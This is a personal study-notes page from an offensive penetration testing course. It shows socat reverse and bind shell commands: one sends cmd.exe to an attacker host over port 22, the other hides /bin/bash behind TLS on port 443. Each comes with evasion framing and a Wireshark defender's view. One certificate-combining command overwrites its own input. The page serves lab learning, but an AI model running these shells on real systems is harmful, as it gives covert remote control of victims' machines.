Cyber With KT
  • About Me
  • 🗃️Courses
    • TCM
      • Practical Ethical Hacking (TCM)
        • Intro
          • Technical Skills Needed
          • Soft Skills Needed
        • Networking Refresher
          • IP Addresses
          • MAC Addresses
          • TCP, UDP, and the Three-Way Handshake
          • Common Ports and Protocols
          • The OSI Model
          • Subnetting
        • Setting Up Our Lab
          • Configuring VirtualBox
        • Introduction to Linux
          • Sudo Overview
          • Navigating the File System
          • Users and Privileges
          • Common Network Commands
          • Installing and Updating Tools
          • Installing gedit
          • Viewing, Creating, and Editing Files
          • Scripting with Bash
          • Creating a basic IP sweep script with BASH.
        • Introduction to Python
          • Strings
          • Maths
          • Variables and Methods
          • Functions
          • Boolean Expressions
          • Relational and Boolean Operators
          • Conditional Statements
          • List
        • Information Gathering (Reconnaissance)
          • Passive Reconnaissance
          • Identifying Our Target
          • Discovering Email Addresses
          • Hunting Breached Credentials with DeHashed
          • Hunting Subdomains Part 1
          • Hunting Subdomains Part 2
          • Identifying Website Technologies
          • Information Gathering with Burp Suite
          • Google Fu
          • Utilizing Social Media
        • Scanning & Enumeration
          • Installing Kioptrix
          • Scanning with Nmap
          • Enumerating HTTP and HTTPS I
          • Enumerating HTTP and HTTPS II
    • Cybrary
      • Offensive Penetration Testing
        • M01 : Setting the Foundation for Success
          • Understanding the Penetration Test Report
          • Penetration Test Report Demo
          • Note Taking and Mind Mapping
          • Finding Resources to Prepare for the Offensive Penetration Testing
        • M02: Kali Linux Basics
          • Setting up the Kali Linux VM
          • Overview of Tools in Kali Linux
          • Understanding the Command Line
          • The who, what, when, where, and how of the Linux command line
          • Windows Commands
        • M03: Understanding Network Protocols
          • Scanning Network Protocols
          • Scanning with Nmap
          • Scanning with Masscan
          • Scanning with Netcat
          • Using Wireshark
          • Wireshark and Encrypted Traffic
          • Weaponizing Wireshark
        • Important Things
  • 📚Concepts
    • Networking & Protocols
      • IP Addresses
  • 🏁Challenges/CTFs
  • 🚩Walkthrough/Writeups
    • TryHackMe
      • 🟩Easy Rooms
      • 🟧Medium Rooms
      • 🟥Hard Rooms
    • HackTheBox
      • 🟩Easy Machines
      • 🟧Medium Machines
      • 🟥Hard Machines
  • 🛠️Tools & Commands
    • Scanning & Enumeration
      • Nmap
    • Web Application Tools
      • Burp Suite
    • Exploitation Tools
    • Privilege Escalation
    • Password Attacks
  • 💎Projects
    • Browser-Based Vulnerability Scanner
  • 📱Content Creation
    • LinkedIn Post Ideas
    • Blog/YouTube Script Drafts
  • 📝Cheat Sheets
    • Nmap Cheatsheet
    • Linux Commands
    • Burp Suite Shortcuts
    • Regex for Security
    • Payloads (XSS, SQLi, LFI, etc.)
  • 🔍OSINT Tools & Notes
    • Tools (theHarvester, Spiderfoot, etc.)
    • People Search Techniques
    • Metadata Analysis
    • Real-life Case Studies
  • 🐞Bug Bounty
  • 💡Research & Experiments
  • Templates & Reporting
  • Interview & Certification Prep
Powered by GitBook
On this page
  • Scenario 1: Unencrypted Reverse Shell over Port 22
  • Scenario 2: Encrypted Bind Shell over Port 443
  • Practicals
  1. Courses
  2. Cybrary
  3. Offensive Penetration Testing
  4. M03: Understanding Network Protocols

Wireshark and Encrypted Traffic

Scenario 1: Unencrypted Reverse Shell over Port 22

Objective:

Create a reverse shell using socat to simulate a connection that may fool defenders by using port 22 (commonly used for SSH).

Commands:

Kali Linux (Attacker's Listener):

socat -d -d TCP-LISTEN:22 STDOUT

Explanation:

  • -d -d: Enables verbose/debug output.

  • TCP-LISTEN:22: Listens on TCP port 22.

  • STDOUT: Outputs received data to the screen.

Windows Victim (Reverse Shell):

socat.exe TCP:<attacker-ip>:22 EXEC:'cmd.exe',pipes

Explanation:

  • Connects back to the attacker on port 22.

  • Executes cmd.exe, piping input/output over the connection.

Defender's View (Wireshark):

  • Traffic on port 22 is expected to be SSH, which is encrypted.

  • However, this traffic is in cleartext, revealing:

    • Command inputs

    • Responses

    • Even passwords

🔴 Red Flag: Cleartext data on port 22 is suspicious.

Scenario 2: Encrypted Bind Shell over Port 443

Objective:

Use an OpenSSL-encrypted bind shell that mimics HTTPS traffic (port 443).

Generate a Self-signed Certificate:

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.pem

Combine key and cert if needed:

cat bind_shell.key bind_shell.pem > bind_shell.pem

Commands:

Host (Target machine with bind shell):

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Explanation:

  • OPENSSL-LISTEN:443: Listens on port 443 with SSL/TLS encryption.

  • cert=bind_shell.pem: Uses the certificate to encrypt traffic.

  • EXEC:/bin/bash: Binds the shell to the connection.

  • fork: Handles multiple connections.

Attacker (Kali):

socat OPENSSL:<target-ip>:443,verify=0 STDIO

Connects securely to the encrypted bind shell.

Defender's View (Wireshark):

  • Traffic on port 443 appears to be legitimate HTTPS.

  • Content is encrypted, so commands and responses are hidden.

More stealthy and harder for defenders to inspect.

Practicals

PreviousUsing WiresharkNextWeaponizing Wireshark

Last updated 8 days ago

🗃️